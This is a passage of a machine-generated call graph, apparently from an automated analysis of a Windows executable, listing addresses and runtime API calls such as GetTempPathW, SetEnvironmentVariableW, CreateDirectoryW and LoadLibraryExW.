7ff6313f405e memcpy_s 16294->16296 16295->16296 16296->16219 16298 7ff6313ee648 memcpy_s 16297->16298 16299 7ff6313e48b0 45 API calls 16298->16299 16300 7ff6313ee702 memcpy_s 16298->16300 16299->16300 16300->16224 16302 7ff6313ee39b 16301->16302 16305 7ff6313ee3e8 memcpy_s 16301->16305 16303 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16302->16303 16304 7ff6313ee3c7 16303->16304 16304->16224 16307 7ff6313ee453 16305->16307 16308 7ff6313e48b0 45 API calls 16305->16308 16306 7ff6313ea8ec __std_exception_copy 37 API calls 16311 7ff6313ee495 memcpy_s 16306->16311 16307->16306 16308->16307 16309 7ff6313ead74 _wfindfirst32i64 17 API calls 16310 7ff6313ee540 16309->16310 16311->16309 16313 7ff6313f039c WideCharToMultiByte 16312->16313 16316 7ff6313e0e43 16315->16316 16317 7ff6313e0e31 16315->16317 16320 7ff6313e0e50 16316->16320 16323 7ff6313e0e8d 16316->16323 16318 7ff6313e52d4 _get_daylight 11 API calls 16317->16318 16319 7ff6313e0e36 16318->16319 16321 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16319->16321 16322 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16320->16322 16331 7ff6313e0e41 16321->16331 16322->16331 16324 7ff6313e0f36 16323->16324 16325 7ff6313e52d4 _get_daylight 11 API calls 16323->16325 16326 7ff6313e52d4 _get_daylight 11 API calls 16324->16326 16324->16331 16327 7ff6313e0f2b 16325->16327 16328 7ff6313e0fe0 16326->16328 16329 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16327->16329 16330 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16328->16330 16329->16324 16330->16331 16331->16058 16333 7ff6313ede41 16332->16333 16334 7ff6313e48ef 16332->16334 16333->16334 16340 7ff6313f3824 16333->16340 16336 7ff6313ede94 16334->16336 16337 7ff6313edead 16336->16337 16339 7ff6313e48ff 16336->16339 16337->16339 16353 7ff6313f2b70 16337->16353 16339->16058 16341 7ff6313eb5c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16340->16341 16342 7ff6313f3833 16341->16342 16343 7ff6313f387e 16342->16343 16352 7ff6313f0b68 EnterCriticalSection 16342->16352 16343->16334 16354 7ff6313eb5c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16353->16354 16355 7ff6313f2b79 16354->16355 16363 7ff6313e517c EnterCriticalSection 16356->16363 16365 7ff6313d284c 16364->16365 16366 7ff6313e4a74 49 API calls 16365->16366 16367 7ff6313d289d 16366->16367 16368 7ff6313e52d4 _get_daylight 11 API calls 16367->16368 16369 7ff6313d28a2 16368->16369 16383 7ff6313e52f4 16369->16383 16372 7ff6313d1e90 49 API calls 16373 7ff6313d28d1 memcpy_s 16372->16373 16374 7ff6313d8a90 57 API calls 16373->16374 16375 7ff6313d2906 16374->16375 16376 7ff6313d2943 MessageBoxA 16375->16376 16377 7ff6313d290b 16375->16377 16379 7ff6313d295d 16376->16379 16378 7ff6313d8a90 57 API calls 16377->16378 16380 7ff6313d2925 MessageBoxW 16378->16380 16381 7ff6313dbc70 _wfindfirst32i64 8 API calls 16379->16381 16380->16379 16382 7ff6313d296d 16381->16382 16382->15745 16384 7ff6313eb738 _get_daylight 11 API calls 16383->16384 16385 7ff6313e530b 16384->16385 16386 7ff6313d28a9 16385->16386 16387 7ff6313ef008 _get_daylight 11 API calls 16385->16387 16390 7ff6313e534b 16385->16390 16386->16372 16388 7ff6313e5340 16387->16388 16389 7ff6313eadbc __free_lconv_mon 11 API calls 16388->16389 16389->16390 16390->16386 16395 7ff6313ef6d8 16390->16395 16393 7ff6313ead74 _wfindfirst32i64 17 API calls 16394 7ff6313e5390 16393->16394 16400 7ff6313ef6f5 16395->16400 16396 7ff6313ef6fa 16397 7ff6313e5371 16396->16397 16398 7ff6313e52d4 _get_daylight 11 API calls 16396->16398 16397->16386 16397->16393 16399 7ff6313ef704 16398->16399 16401 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16399->16401 16400->16396 16400->16397 16402 7ff6313ef744 16400->16402 16401->16397 16402->16397 16403 7ff6313e52d4 _get_daylight 11 API calls 16402->16403 16403->16399 16405 7ff6313d8c32 WideCharToMultiByte 16404->16405 16406 7ff6313d8bc4 WideCharToMultiByte 16404->16406 16407 7ff6313d8c5f 16405->16407 16414 7ff6313d3ed5 16405->16414 16408 7ff6313d8c05 16406->16408 16409 7ff6313d8bee 16406->16409 16410 7ff6313d2980 57 API calls 16407->16410 16408->16405 16412 7ff6313d8c1b 16408->16412 16411 7ff6313d2980 57 API calls 16409->16411 16410->16414 16411->16414 16413 7ff6313d2980 57 API calls 16412->16413 16413->16414 16414->15756 16414->15757 16416 7ff6313d7b8e 16415->16416 16417 7ff6313ea863 16415->16417 16416->15772 16417->16416 16418 7ff6313ea8ec __std_exception_copy 37 API calls 16417->16418 16419 7ff6313ea890 16418->16419 16419->16416 16420 7ff6313ead74 _wfindfirst32i64 17 API calls 16419->16420 16421 7ff6313ea8c0 16420->16421 16423 7ff6313d3f80 116 API calls 16422->16423 16424 7ff6313d1a76 16423->16424 16425 7ff6313d1c24 16424->16425 16427 7ff6313d8260 83 API calls 16424->16427 16426 7ff6313dbc70 _wfindfirst32i64 8 API calls 16425->16426 16429 7ff6313d1c38 16426->16429 16428 7ff6313d1aae 16427->16428 16454 7ff6313d1adf 16428->16454 16461 7ff6313e07c4 16428->16461 16429->15782 16455 7ff6313d3df0 16429->16455 16431 7ff6313e013c 74 API calls 16431->16425 16432 7ff6313d1ac8 16433 7ff6313d1ae4 16432->16433 16434 7ff6313d1acc 16432->16434 16465 7ff6313e048c 16433->16465 16435 7ff6313d2830 59 API calls 16434->16435 16435->16454 16438 7ff6313d1aff 16440 7ff6313d2830 59 API calls 16438->16440 16439 7ff6313d1b17 16441 7ff6313e07c4 73 API calls 16439->16441 16440->16454 16442 7ff6313d1b64 16441->16442 16443 7ff6313d1b8e 16442->16443 16444 7ff6313d1b76 16442->16444 16446 7ff6313e048c _fread_nolock 53 API calls 16443->16446 16445 7ff6313d2830 59 API calls 16444->16445 16445->16454 16447 7ff6313d1ba3 16446->16447 16448 7ff6313d1bbe 16447->16448 16449 7ff6313d1ba9 16447->16449 16468 7ff6313e0200 16448->16468 16450 7ff6313d2830 59 API calls 16449->16450 16450->16454 16453 7ff6313d2ad0 59 API calls 16453->16454 16454->16431 16454->16454 16456 7ff6313d1e90 49 API calls 16455->16456 16457 7ff6313d3e0d 16456->16457 16457->15792 16459 7ff6313d1e90 49 API calls 16458->16459 16460 7ff6313d4030 16459->16460 16460->15782 16462 7ff6313e07f4 16461->16462 16474 7ff6313e0554 16462->16474 16464 7ff6313e080d 16464->16432 16486 7ff6313e04ac 16465->16486 16469 7ff6313d1bd2 16468->16469 16470 7ff6313e0209 16468->16470 16469->16453 16469->16454 16471 7ff6313e52d4 _get_daylight 11 API calls 16470->16471 16475 7ff6313e05be 16474->16475 16476 7ff6313e057e 16474->16476 16475->16476 16478 7ff6313e05ca 16475->16478 16477 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16476->16477 16479 7ff6313e05a5 16477->16479 16485 7ff6313e517c EnterCriticalSection 16478->16485 16479->16464 16487 7ff6313e04d6 16486->16487 16498 7ff6313d1af9 16486->16498 16488 7ff6313e0522 16487->16488 16489 7ff6313e04e5 memcpy_s 16487->16489 16487->16498 16499 7ff6313e517c EnterCriticalSection 16488->16499 16492 7ff6313e52d4 _get_daylight 11 API calls 16489->16492 16494 7ff6313e04fa 16492->16494 16496 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16494->16496 16496->16498 16498->16438 16498->16439 16501 7ff6313d7916 16500->16501 16502 7ff6313d793a 16501->16502 16503 7ff6313d798d GetTempPathW 16501->16503 16504 7ff6313d7b10 61 API calls 16502->16504 16505 7ff6313d79a2 16503->16505 16506 7ff6313d7946 16504->16506 16539 7ff6313d27d0 16505->16539 16563 7ff6313d73d0 16506->16563 16512 7ff6313dbc70 _wfindfirst32i64 8 API calls 16514 7ff6313d154f 16512->16514 16513 7ff6313d796c __std_exception_copy 16513->16503 16518 7ff6313d797a 16513->16518 16514->15801 16514->15802 16516 7ff6313d79bb __std_exception_copy 16517 7ff6313d7a66 16516->16517 16522 7ff6313d79f1 16516->16522 16543 7ff6313e8954 16516->16543 16546 7ff6313d8900 16516->16546 16520 7ff6313d8ba0 59 API calls 16517->16520 16519 7ff6313d2ad0 59 API calls 16518->16519 16523 7ff6313d7a77 __std_exception_copy 16520->16523 16524 7ff6313d8a90 57 API calls 16522->16524 16535 7ff6313d7a2a __std_exception_copy 16522->16535 16525 7ff6313d8a90 57 API calls 16523->16525 16523->16535 16526 7ff6313d7a07 16524->16526 16527 7ff6313d7a95 16525->16527 16528 7ff6313d7a0c 16526->16528 16529 7ff6313d7a49 SetEnvironmentVariableW 16526->16529 16530 7ff6313d7a9a 16527->16530 16531 7ff6313d7acd SetEnvironmentVariableW 16527->16531 16532 7ff6313d8a90 57 API calls 16528->16532 16529->16535 16534 7ff6313d8a90 57 API calls 16530->16534 16531->16535 16533 7ff6313d7a1c 16532->16533 16536 7ff6313e7c9c 38 API calls 16533->16536 16537 7ff6313d7aaa 16534->16537 16535->16512 16536->16535 16538 7ff6313e7c9c 38 API calls 16537->16538 16538->16535 16540 7ff6313d27f5 16539->16540 16597 7ff6313e4cc8 16540->16597 16791 7ff6313e8580 16543->16791 16547 7ff6313dbc10 16546->16547 16548 7ff6313d8910 GetCurrentProcess OpenProcessToken 16547->16548 16549 7ff6313d89d1 __std_exception_copy 16548->16549 16550 7ff6313d895b GetTokenInformation 16548->16550 16553 7ff6313d89e4 CloseHandle 16549->16553 16554 7ff6313d89ea 16549->16554 16551 7ff6313d897d GetLastError 16550->16551 16552 7ff6313d8988 16550->16552 16551->16549 16551->16552 16552->16549 16556 7ff6313d899e GetTokenInformation 16552->16556 16553->16554 16922 7ff6313d8600 16554->16922 16556->16549 16558 7ff6313d89c4 ConvertSidToStringSidW 16556->16558 16558->16549 16564 7ff6313d73dc 16563->16564 16565 7ff6313d8a90 57 API calls 16564->16565 16566 7ff6313d73fe 16565->16566 16567 7ff6313d7406 16566->16567 16568 7ff6313d7419 ExpandEnvironmentStringsW 16566->16568 16569 7ff6313d2ad0 59 API calls 16567->16569 16570 7ff6313d743f __std_exception_copy 16568->16570 16576 7ff6313d7412 16569->16576 16571 7ff6313d7443 16570->16571 16572 7ff6313d7456 16570->16572 16574 7ff6313d2ad0 59 API calls 16571->16574 16577 7ff6313d7464 16572->16577 16578 7ff6313d7470 16572->16578 16573 7ff6313dbc70 _wfindfirst32i64 8 API calls 16575 7ff6313d7538 16573->16575 16574->16576 16575->16535 16587 7ff6313e7c9c 16575->16587 16576->16573 16926 7ff6313e7854 16577->16926 16933 7ff6313e61d8 16578->16933 16581 7ff6313d746e 16582 7ff6313d748a 16581->16582 16586 7ff6313d749d memcpy_s 16581->16586 16583 7ff6313d2ad0 59 API calls 16582->16583 16583->16576 16584 7ff6313d7512 CreateDirectoryW 16584->16576 16585 7ff6313d74ec CreateDirectoryW 16585->16586 16586->16584 16586->16585 16588 7ff6313e7cbc 16587->16588 16589 7ff6313e7ca9 16587->16589 17025 7ff6313e7920 16588->17025 16590 7ff6313e52d4 _get_daylight 11 API calls 16589->16590 16592 7ff6313e7cae 16590->16592 16594 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16592->16594 16595 7ff6313e7cba 16594->16595 16595->16513 16599 7ff6313e4d22 16597->16599 16598 7ff6313e4d47 16600 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16598->16600 16599->16598 16601 7ff6313e4d83 16599->16601 16603 7ff6313e4d71 16600->16603 16615 7ff6313e3080 16601->16615 16606 7ff6313dbc70 _wfindfirst32i64 8 API calls 16603->16606 16604 7ff6313eadbc __free_lconv_mon 11 API calls 16604->16603 16608 7ff6313d2814 16606->16608 16607 7ff6313e4e64 16607->16604 16608->16516 16609 7ff6313e4e8a 16609->16607 16612 7ff6313e4e94 16609->16612 16610 7ff6313e4e39 16613 7ff6313eadbc __free_lconv_mon 11 API calls 16610->16613 16611 7ff6313e4e30 16611->16607 16611->16610 16614 7ff6313eadbc __free_lconv_mon 11 API calls 16612->16614 16613->16603 16614->16603 16616 7ff6313e30be 16615->16616 16617 7ff6313e30ae 16615->16617 16618 7ff6313e30c7 16616->16618 16622 7ff6313e30f5 16616->16622 16621 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16617->16621 16619 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16618->16619 16620 7ff6313e30ed 16619->16620 16620->16607 16620->16609 16620->16610 16620->16611 16621->16620 16622->16617 16622->16620 16626 7ff6313e3a94 16622->16626 16659 7ff6313e34e0 16622->16659 16696 7ff6313e2c70 16622->16696 16627 7ff6313e3b47 16626->16627 16628 7ff6313e3ad6 16626->16628 16629 7ff6313e3ba0 16627->16629 16630 7ff6313e3b4c 16627->16630 16631 7ff6313e3b71 16628->16631 16632 7ff6313e3adc 16628->16632 16638 7ff6313e3baa 16629->16638 16639 7ff6313e3bb7 16629->16639 16644 7ff6313e3baf 16629->16644 16633 7ff6313e3b4e 16630->16633 16634 7ff6313e3b81 16630->16634 16715 7ff6313e1e44 16631->16715 16635 7ff6313e3ae1 16632->16635 16636 7ff6313e3b10 16632->16636 16637 7ff6313e3af0 16633->16637 16647 7ff6313e3b5d 16633->16647 16722 7ff6313e1a34 16634->16722 16635->16639 16641 7ff6313e3ae7 16635->16641 16636->16641 16636->16644 16657 7ff6313e3be0 16637->16657 16699 7ff6313e4248 16637->16699 16638->16631 16638->16644 16729 7ff6313e479c 16639->16729 16641->16637 16646 7ff6313e3b22 16641->16646 16655 7ff6313e3b0b 16641->16655 16644->16657 16733 7ff6313e2254 16644->16733 16646->16657 16709 7ff6313e4584 16646->16709 16647->16631 16649 7ff6313e3b62 16647->16649 16653 7ff6313e4648 37 API calls 16649->16653 16649->16657 16651 7ff6313dbc70 _wfindfirst32i64 8 API calls 16652 7ff6313e3eda 16651->16652 16652->16622 16653->16655 16654 7ff6313e48b0 45 API calls 16658 7ff6313e3dcc 16654->16658 16655->16654 16655->16657 16655->16658 16657->16651 16658->16657 16740 7ff6313eee78 16658->16740 16660 7ff6313e3504 16659->16660 16661 7ff6313e34ee 16659->16661 16662 7ff6313e3544 16660->16662 16665 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16660->16665 16661->16662 16663 7ff6313e3b47 16661->16663 16664 7ff6313e3ad6 16661->16664 16662->16622 16666 7ff6313e3ba0 16663->16666 16667 7ff6313e3b4c 16663->16667 16668 7ff6313e3b71 16664->16668 16669 7ff6313e3adc 16664->16669 16665->16662 16675 7ff6313e3baa 16666->16675 16676 7ff6313e3bb7 16666->16676 16681 7ff6313e3baf 16666->16681 16670 7ff6313e3b4e 16667->16670 16671 7ff6313e3b81 16667->16671 16677 7ff6313e1e44 38 API calls 16668->16677 16672 7ff6313e3ae1 16669->16672 16673 7ff6313e3b10 16669->16673 16674 7ff6313e3af0 16670->16674 16683 7ff6313e3b5d 16670->16683 16679 7ff6313e1a34 38 API calls 16671->16679 16672->16676 16678 7ff6313e3ae7 16672->16678 16673->16678 16673->16681 16680 7ff6313e4248 47 API calls 16674->16680 16694 7ff6313e3be0 16674->16694 16675->16668 16675->16681 16682 7ff6313e479c 45 API calls 16676->16682 16691 7ff6313e3b0b 16677->16691 16678->16674 16684 7ff6313e3b22 16678->16684 16678->16691 16679->16691 16680->16691 16685 7ff6313e2254 38 API calls 16681->16685 16681->16694 16682->16691 16683->16668 16686 7ff6313e3b62 16683->16686 16687 7ff6313e4584 46 API calls 16684->16687 16684->16694 16685->16691 16689 7ff6313e4648 37 API calls 16686->16689 16686->16694 16687->16691 16688 7ff6313dbc70 _wfindfirst32i64 8 API calls 16690 7ff6313e3eda 16688->16690 16689->16691 16690->16622 16692 7ff6313e48b0 45 API calls 16691->16692 16691->16694 16695 7ff6313e3dcc 16691->16695 16692->16695 16693 7ff6313eee78 46 API calls 16693->16695 16694->16688 16695->16693 16695->16694 16774 7ff6313e10b8 16696->16774 16700 7ff6313e426e 16699->16700 16701 7ff6313e0c70 12 API calls 16700->16701 16702 7ff6313e42be 16701->16702 16703 7ff6313ee9e0 46 API calls 16702->16703 16711 7ff6313e45b9 16709->16711 16710 7ff6313e45fe 16710->16655 16711->16710 16712 7ff6313e45d7 16711->16712 16713 7ff6313e48b0 45 API calls 16711->16713 16714 7ff6313eee78 46 API calls 16712->16714 16713->16712 16714->16710 16716 7ff6313e1e77 16715->16716 16717 7ff6313e1ea6 16716->16717 16719 7ff6313e1f63 16716->16719 16721 7ff6313e1ee3 16717->16721 16752 7ff6313e0d18 16717->16752 16720 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16719->16720 16720->16721 16721->16655 16723 7ff6313e1a67 16722->16723 16724 7ff6313e1a96 16723->16724 16726 7ff6313e1b53 16723->16726 16725 7ff6313e0d18 12 API calls 16724->16725 16728 7ff6313e1ad3 16724->16728 16725->16728 16727 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16726->16727 16727->16728 16728->16655 16730 7ff6313e47df 16729->16730 16732 7ff6313e47e3 __crtLCMapStringW 16730->16732 16760 7ff6313e4838 16730->16760 16732->16655 16734 7ff6313e2287 16733->16734 16735 7ff6313e22b6 16734->16735 16737 7ff6313e2373 16734->16737 16736 7ff6313e0d18 12 API calls 16735->16736 16739 7ff6313e22f3 16735->16739 16736->16739 16738 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16737->16738 16738->16739 16739->16655 16741 7ff6313eeea9 16740->16741 16750 7ff6313eeeb7 16740->16750 16742 7ff6313eeed7 16741->16742 16743 7ff6313e48b0 45 API calls 16741->16743 16741->16750 16743->16742 16750->16658 16753 7ff6313e0d4f 16752->16753 16754 7ff6313e0d3e 16752->16754 16753->16754 16755 7ff6313eda6c _fread_nolock 12 API calls 16753->16755 16754->16721 16756 7ff6313e0d80 16755->16756 16761 7ff6313e485e 16760->16761 16762 7ff6313e4856 16760->16762 16761->16732 16763 7ff6313e48b0 45 API calls 16762->16763 16763->16761 16775 7ff6313e10ff 16774->16775 16776 7ff6313e10ed 16774->16776 16779 7ff6313e110d 16775->16779 16782 7ff6313e1149 16775->16782 16777 7ff6313e52d4 _get_daylight 11 API calls 16776->16777 16778 7ff6313e10f2 16777->16778 16780 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16778->16780 16781 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 16779->16781 16786 7ff6313e10fd 16780->16786 16781->16786 16783 7ff6313e14c5 16782->16783 16785 7ff6313e52d4 _get_daylight 11 API calls 16782->16785 16784 7ff6313e52d4 _get_daylight 11 API calls 16783->16784 16783->16786 16787 7ff6313e1759 16784->16787 16788 7ff6313e14ba 16785->16788 16786->16622 16789 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16787->16789 16790 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16788->16790 16789->16786 16790->16783 16832 7ff6313f1a78 16791->16832 16891 7ff6313f17f0 16832->16891 16912 7ff6313f0b68 EnterCriticalSection 16891->16912 16923 7ff6313d8625 16922->16923 16924 7ff6313e4cc8 48 API calls 16923->16924 16927 7ff6313e78a5 16926->16927 16928 7ff6313e7872 16926->16928 16927->16581 16928->16927 16929 7ff6313f0d04 _wfindfirst32i64 37 API calls 16928->16929 16930 7ff6313e78a1 16929->16930 16930->16927 16931 7ff6313ead74 _wfindfirst32i64 17 API calls 16930->16931 16932 7ff6313e78d5 16931->16932 16934 7ff6313e6262 16933->16934 16935 7ff6313e61f4 16933->16935 16970 7ff6313f0350 16934->16970 16935->16934 16937 7ff6313e61f9 16935->16937 16938 7ff6313e622e 16937->16938 16939 7ff6313e6211 16937->16939 16953 7ff6313e601c GetFullPathNameW 16938->16953 16945 7ff6313e5fa8 GetFullPathNameW 16939->16945 16944 7ff6313e6226 __std_exception_copy 16944->16581 16946 7ff6313e5fce GetLastError 16945->16946 16949 7ff6313e5fe4 16945->16949 16947 7ff6313e5248 _fread_nolock 11 API calls 16946->16947 16948 7ff6313e5fdb 16947->16948 16950 7ff6313e52d4 _get_daylight 11 API calls 16948->16950 16951 7ff6313e52d4 _get_daylight 11 API calls 16949->16951 16952 7ff6313e5fe0 16949->16952 16950->16952 16951->16952 16952->16944 16954 7ff6313e604f GetLastError 16953->16954 16958 7ff6313e6065 __std_exception_copy 16953->16958 16955 7ff6313e5248 _fread_nolock 11 API calls 16954->16955 16956 7ff6313e605c 16955->16956 16957 7ff6313e52d4 _get_daylight 11 API calls 16956->16957 16959 7ff6313e6061 16957->16959 16958->16959 16960 7ff6313e60bf GetFullPathNameW 16958->16960 16961 7ff6313e60f4 16959->16961 16960->16954 16960->16959 16962 7ff6313e6168 memcpy_s 16961->16962 16966 7ff6313e611d memcpy_s 16961->16966 16962->16944 16963 7ff6313e6151 16966->16962 16966->16963 16968 7ff6313e618a 16966->16968 16968->16962 16973 7ff6313f0160 16970->16973 16974 7ff6313f01a2 16973->16974 16975 7ff6313f018b 16973->16975 16977 7ff6313f01a6 16974->16977 16978 7ff6313f01c7 16974->16978 16976 7ff6313e52d4 _get_daylight 11 API calls 16975->16976 16982 7ff6313f0190 16976->16982 16999 7ff6313f02cc 16977->16999 17011 7ff6313ef7c8 16978->17011 16984 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 16982->16984 16998 7ff6313f019b __std_exception_copy 16984->16998 17000 7ff6313f0316 16999->17000 17001 7ff6313f02e6 16999->17001 17003 7ff6313f0321 GetDriveTypeW 17000->17003 17004 7ff6313f0301 17000->17004 17002 7ff6313e52b4 _fread_nolock 11 API calls 17001->17002 17003->17004 17012 7ff6313dd090 memcpy_s 17011->17012 17013 7ff6313ef7fe GetCurrentDirectoryW 17012->17013 17032 7ff6313f0b68 EnterCriticalSection 17025->17032 17034 7ff6313d173e 17033->17034 17035 7ff6313d1726 17033->17035 17037 7ff6313d1744 17034->17037 17038 7ff6313d1768 17034->17038 17036 7ff6313d2ad0 59 API calls 17035->17036 17041 7ff6313d1732 17036->17041 17161 7ff6313d12b0 17037->17161 17124 7ff6313d7bc0 17038->17124 17041->15826 17044 7ff6313d175f 17044->15826 17045 7ff6313d178d 17048 7ff6313d2830 59 API calls 17045->17048 17046 7ff6313d17b9 17049 7ff6313d3f80 116 API calls 17046->17049 17047 7ff6313d2ad0 59 API calls 17047->17044 17050 7ff6313d17a3 17048->17050 17051 7ff6313d17ce 17049->17051 17050->15826 17052 7ff6313d17ee 17051->17052 17053 7ff6313d17d6 17051->17053 17054 7ff6313e07c4 73 API calls 17052->17054 17055 7ff6313d2ad0 59 API calls 17053->17055 17076 7ff6313d2d26 17075->17076 17077 7ff6313d1e90 49 API calls 17076->17077 17078 7ff6313d2d59 17077->17078 17079 7ff6313d3df0 49 API calls 17078->17079 17105 7ff6313d308a 17078->17105 17080 7ff6313d2dc7 17079->17080 17081 7ff6313d3df0 49 API calls 17080->17081 17082 7ff6313d2dd8 17081->17082 17083 7ff6313d2e35 17082->17083 17084 7ff6313d2df9 17082->17084 17085 7ff6313d3160 75 API calls 17083->17085 17296 7ff6313d3160 17084->17296 17087 7ff6313d2e33 17085->17087 17088 7ff6313d2e74 17087->17088 17089 7ff6313d2eb6 17087->17089 17304 7ff6313d7550 17088->17304 17091 7ff6313d3160 75 API calls 17089->17091 17093 7ff6313d2ee0 17091->17093 17097 7ff6313d3160 75 API calls 17093->17097 17102 7ff6313d2f7c 17093->17102 17099 7ff6313d2f12 17097->17099 17099->17102 17100 7ff6313d1e50 59 API calls 17102->17100 17117 7ff6313d308f 17102->17117 17125 7ff6313d7bd0 17124->17125 17126 7ff6313d1e90 49 API calls 17125->17126 17127 7ff6313d7c11 17126->17127 17141 7ff6313d7c91 17127->17141 17204 7ff6313d3f10 17127->17204 17129 7ff6313dbc70 _wfindfirst32i64 8 API calls 17131 7ff6313d1785 17129->17131 17131->17045 17131->17046 17132 7ff6313d7ccb 17210 7ff6313d7770 17132->17210 17134 7ff6313d7c80 17135 7ff6313d7b10 61 API calls 17142 7ff6313d7c42 __std_exception_copy 17135->17142 17139 7ff6313d7cb4 17141->17129 17142->17134 17142->17139 17162 7ff6313d12c2 17161->17162 17163 7ff6313d3f80 116 API calls 17162->17163 17164 7ff6313d12f2 17163->17164 17165 7ff6313d1311 17164->17165 17166 7ff6313d12fa 17164->17166 17168 7ff6313e07c4 73 API calls 17165->17168 17167 7ff6313d2ad0 59 API calls 17166->17167 17197 7ff6313d130a __std_exception_copy 17167->17197 17169 7ff6313d1323 17168->17169 17170 7ff6313d1327 17169->17170 17173 7ff6313d134d 17169->17173 17171 7ff6313d2830 59 API calls 17170->17171 17172 7ff6313d133e 17171->17172 17174 7ff6313e013c 74 API calls 17172->17174 17175 7ff6313d1390 17173->17175 17176 7ff6313d1368 17173->17176 17174->17197 17180 7ff6313d13aa 17175->17180 17191 7ff6313d1463 17175->17191 17179 7ff6313d2830 59 API calls 17176->17179 17177 7ff6313dbc70 _wfindfirst32i64 8 API calls 17178 7ff6313d1454 17177->17178 17178->17044 17178->17047 17182 7ff6313d1383 17179->17182 17183 7ff6313d1050 98 API calls 17180->17183 17181 7ff6313d13c3 17184 7ff6313e013c 74 API calls 17181->17184 17185 7ff6313e013c 74 API calls 17182->17185 17186 7ff6313d13bb 17183->17186 17185->17197 17186->17181 17188 7ff6313e048c _fread_nolock 53 API calls 17188->17191 17191->17181 17191->17188 17193 7ff6313d14bb 17191->17193 17194 7ff6313d2830 59 API calls 17193->17194 17197->17177 17205 7ff6313d3f1a 17204->17205 17206 7ff6313d8a90 57 API calls 17205->17206 17207 7ff6313d3f42 17206->17207 17208 7ff6313dbc70 _wfindfirst32i64 8 API calls 17207->17208 17209 7ff6313d3f6a 17208->17209 17209->17132 17209->17135 17209->17142 17297 7ff6313d3194 17296->17297 17298 7ff6313e4a74 49 API calls 17297->17298 17299 7ff6313d31ba 17298->17299 17300 7ff6313d31cb 17299->17300 17341 7ff6313e5c98 17299->17341 17302 7ff6313dbc70 _wfindfirst32i64 8 API calls 17300->17302 17303 7ff6313d31e9 17302->17303 17303->17087 17305 7ff6313d755e 17304->17305 17306 7ff6313d3f80 116 API calls 17305->17306 17307 7ff6313d758d 17306->17307 17342 7ff6313e5cb5 17341->17342 17343 7ff6313e5cc1 17341->17343 17605 7ff6313e628c 17604->17605 17606 7ff6313e62b2 17605->17606 17608 7ff6313e62e5 17605->17608 17607 7ff6313e52d4 _get_daylight 11 API calls 17606->17607 17609 7ff6313e62b7 17607->17609 17610 7ff6313e62eb 17608->17610 17611 7ff6313e62f8 17608->17611 17612 7ff6313ead54 _invalid_parameter_noinfo 37 API calls 17609->17612 17613 7ff6313e52d4 _get_daylight 11 API calls 17610->17613 17623 7ff6313eb09c 17611->17623 17622 7ff6313d3fd9 17612->17622 17613->17622 17622->15900 17636 7ff6313f0b68 EnterCriticalSection 17623->17636 17984 7ff6313e8f50 17983->17984 17987 7ff6313e8a2c 17984->17987 17988 7ff6313e8a76 17987->17988 17989 7ff6313e8a47 17987->17989 17997 7ff6313e517c EnterCriticalSection 17988->17997 17990 7ff6313eac88 _invalid_parameter_noinfo 37 API calls 17989->17990 17999 7ff6313dff33 17998->17999 18000 7ff6313dff61 17998->18000 18010 7ff6313d3f80 116 API calls 18009->18010 18011 7ff6313d15c7 18010->18011 18012 7ff6313d15cf 18011->18012 18013 7ff6313d15f0 18011->18013 18014 7ff6313d2ad0 59 API calls 18012->18014 18015 7ff6313e07c4 73 API calls 18013->18015 18016 7ff6313d15df 18014->18016 18017 7ff6313d1601 18015->18017 18016->15919 18018 7ff6313d1605 18017->18018 18019 7ff6313d1621 18017->18019 18020 7ff6313d2830 59 API calls 18018->18020 18021 7ff6313d1651 18019->18021 18022 7ff6313d1631 18019->18022 18031 7ff6313d161c __std_exception_copy 18020->18031 18024 7ff6313d1666 18021->18024 18029 7ff6313d167d 18021->18029 18023 7ff6313d2830 59 API calls 18022->18023 18023->18031 18026 7ff6313d1050 98 API calls 18024->18026 18025 7ff6313e013c 74 API calls 18027 7ff6313d16f7 18025->18027 18026->18031 18027->15919 18028 7ff6313e048c _fread_nolock 53 API calls 18028->18029 18029->18028 18030 7ff6313d16be 18029->18030 18029->18031 18032 7ff6313d2830 59 API calls 18030->18032 18031->18025 18032->18031 18034 7ff6313d8a90 57 API calls 18033->18034 18035 7ff6313d8227 LoadLibraryExW 18034->18035 18036 7ff6313d8244 __std_exception_copy 18035->18036 18036->15945 18097 7ff6313d5b80 18096->18097 18098 7ff6313d1e90 49 API calls 18097->18098 18099 7ff6313d5bb2 18098->18099 18100 7ff6313d5bdb 18099->18100 18101 7ff6313d5bbb 18099->18101 18102 7ff6313d5c32 18100->18102 18104 7ff6313d4000 49 API calls 18100->18104 18103 7ff6313d2ad0 59 API calls 18101->18103 18105 7ff6313d4000 49 API calls 18102->18105 18123 7ff6313d5bd1 18103->18123 18106 7ff6313d5bfc 18104->18106 18107 7ff6313d5c4b 18105->18107 18108 7ff6313d5c1a 18106->18108 18112 7ff6313d2ad0 59 API calls 18106->18112 18110 7ff6313d5c69 18107->18110 18115 7ff6313d2ad0 59 API calls 18107->18115 18113 7ff6313d3f10 57 API calls 18108->18113 18109 7ff6313dbc70 _wfindfirst32i64 8 API calls 18114 7ff6313d341e 18109->18114 18111 7ff6313d8210 58 API calls 18110->18111 18116 7ff6313d5c76 18111->18116 18112->18108 18117 7ff6313d5c24 18113->18117 18114->15966 18124 7ff6313d5cd0 18114->18124 18115->18110 18118 7ff6313d5c7b 18116->18118 18119 7ff6313d5c9d 18116->18119 18117->18102 18122 7ff6313d8210 58 